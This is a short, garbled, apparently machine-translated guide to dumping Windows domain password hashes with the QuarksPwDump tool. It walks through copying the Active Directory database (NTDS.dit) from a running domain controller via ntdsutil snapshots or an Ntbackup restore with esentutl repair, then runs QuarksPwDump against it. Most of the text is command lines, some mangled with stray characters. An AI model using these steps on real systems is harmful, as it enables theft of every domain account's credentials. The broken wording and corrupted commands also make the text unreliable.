Quarkspwdump The author describes the usage:
1. Windows 2008 |
|
|
|
Microsoft recently implements VSS (Volume Shadow Copy Service) which allow a administrator to make |
|
FileSystem snapshots While the operating are running and writing to current backuped files. |
|
|
|
Here is a-to-backup Ntds.dit file while a domain controller is running: |
|
|
|
#ntdsutil |
|
#snapshot |
|
#activate instance NTDS |
|
#create |
|
#mount {GUID} |
|
#copy C:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit C:\NTDS_saved.dit |
|
#unmount {GUID} |
|
#quit |
|
#quit |
|
|
|
If Ad Server hasn ' t the "ad DS role", you had to use Dsdbutil.exe command in the same. |
|
|
|
|
|
|
2. Windows 2003 |
|
|
On the This version, the VSS has been implemented and not ntds-type snapshots. |
|
But you can use the Ntbackup tool, this is the procedure: |
|
|
|
-Launch NTBACKUP GUI |
|
-Use the Backup Wizard (Advanced) |
|
-Choose to save System State, only and Choose output filename |
|
-Wait Some minutes |
|
-Use the Restore Wizard (Advanced) |
|
-Choise your backup, click Next and use the Advanced button |
|
-Choose to restore file on another location (C:\tmp\ for example) |
|
-Choose to overwrite everything and next uncheck all restoration parameters |
|
-Validate and wait some minutes |
|
-Open a command shell to "c:\tmp\Active Directory" |
|
-We need to repair the database with this command |
|
#esentutl/P Ntds.dit |
|
-Validate warning and wait some minutes |
|
|
|
Ntds.dit file can now is used with Quarkspwdump. |
which
#ntdsutil #snapshot#activate instance ntds#create#mount {GUID} #copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_ Saved.dit#unmount {GUID} #quit #quit
Available for interactive or direct login status.
If it is semi-interactive, you can use the following methods (see the usage online):
ntdsutil snapshot "activate instance NTDS" Create quit quitntdsutil Snapshot "mount {GUID}" quit Quitcopy mount_point\windows\ntds\ntds.dit c:\ntds.ditntdsutil snapshot " unmount {GUID} " Quit Quit2 v P5 I2 O entdsutil snapshot "Delete {GUID}" quit quit
At last
QuarksPwDump.exe--dump-hash-domain--ntds-file C:\ntds.dit
Windows 2003 Windows 2012 export domain-controlled hash method